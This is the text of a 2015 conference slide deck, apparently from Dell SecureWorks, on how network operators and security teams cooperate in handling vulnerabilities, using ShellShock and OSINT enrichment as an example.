APRICOT 2015 Security Day
Agenda
• Cooperation between NW Operators and Security Teams
• Vulnerability Handling
– Traditional questions
• Challenges and Gaps
• ShellShock example
– Enrichment of OSINT
• Conclusion: Actionable intelligence
2
Dell - Internal Use - Confidential
Classification: //Dell SecureWorks/Confidential - Limited External Distribution:
Traditional Cooperation Model/Cases
Between N/W Operators and Security Teams
• Identify a stakeholder
– Where does this hostile resource (IP/Domain) belongs to?
– Who is the attacker?
– Overload or Side work on N/W operation
• Vulnerability on N/W appliances
– H/W and S/W
– Management Console (Software)
• N/W protocol based vulnerability
– POODLE SSL v3
• DDoS attack
– NTP, DNS reflective Amplification attack
3
Dell - Internal Use - Confidential
Classification: //Dell SecureWorks/Confidential - Limited External Distribution:
Traditional questions on a vulnerability
• Both for Security Teams and Network operators
– For all stakeholders
• Questions
– What is the technical detail for the new vulnerability?
– Does a technical mitigation resolution exists?
– Zero-day vulnerability
– Mitigation plan
– What and who is impacted?
– Impacted products (Hardware / Software)
– Scope of impact in constituency
– Is there an (successful) exploit / incident case?
– Exploit activity
– Malware or Tools associated
– Alternative mitigation plan?
– Disable service
– Actionable Intelligence
CVSS (Common Vulnerability Scoring System) framework is widely adopted to address the
questions.
4
Dell - Internal Use - Confidential
Classification: //Dell SecureWorks/Confidential - Limited External Distribution:
Challenges and Gap
• Security Teams
–Vendor Dependent
–Lack of information
› Identify the stakeholder
–Deliverables
› Vuln. Advisory
› Link to Patches
› Indicators
5
• Network Operators
–Legal issues
› Client information
disclosure
–Additional workload
–Mitigation Plan
› Implementing Patches
on production N/W
–Lack of Contents for
indicators
–Perception on N/W
availability
Dell - Internal Use - Confidential
Classification: //Dell SecureWorks/Confidential - Limited External Distribution:
Change in Threat Landscape
• N/W providers involvement in IT services increases
– Outsourced N/W service, including security
– Could Computing (data centers)
• N/W Admins are often targeted as an initial attack
vector
6
Dell - Internal Use - Confidential
Classification: //Dell SecureWorks/Confidential - Limited External Distribution:
What is ShellShock
• Shellshock, also known as Bashdoor, is a family of security bugs[2]
in the widely used Unix Bash shell, the first of which was disclosed
on 24 September 2014. Many Internet-facing services, such as
some web server deployments, use Bash to process certain
requests, allowing an attacker to cause vulnerable versions of
Bash to execute arbitrary commands. This can allow an attacker
to gain unauthorized access to a computer system.
• Attackers exploited Shellshock within hours of the initial
disclosure by creating botnets of compromised computers to
perform distributed denial-of-service attacks and vulnerability
scanning.
Reference: http://en.wikipedia.org/wiki/Shellshock_(software_bug)
7
Dell - Internal Use - Confidential
Classification: //Dell SecureWorks/Confidential - Limited External Distribution:
• OSINT
– List of CVEs
– List of CPEs
– (Malicious indicators)
• Enrichment
–
–
–
–
–
Additional payload or malware
Association with known TG
Association with known malicious infrastructure
Passive DNS records
etc.
• Demonstration on ShellShock investigation
8
Dell - Internal Use - Confidential
Classification: //Dell SecureWorks/Confidential - Limited External Distribution:
• Vulnerability Advisories are not easy to digest or to take action
– Mostly lack of content
– Risk of blocking legitimate services
• Security Teams should start to provide more details
• N/W operators need to focus more on vulnerabilities
mitigation in a N/W level. Still do not forget about host
based vulnerabilities.
• Actionable intelligence promotes the coordination and better
mitigation plan in timely manner
9
Dell - Internal Use - Confidential
Classification: //Dell SecureWorks/Confidential - Limited External Distribution: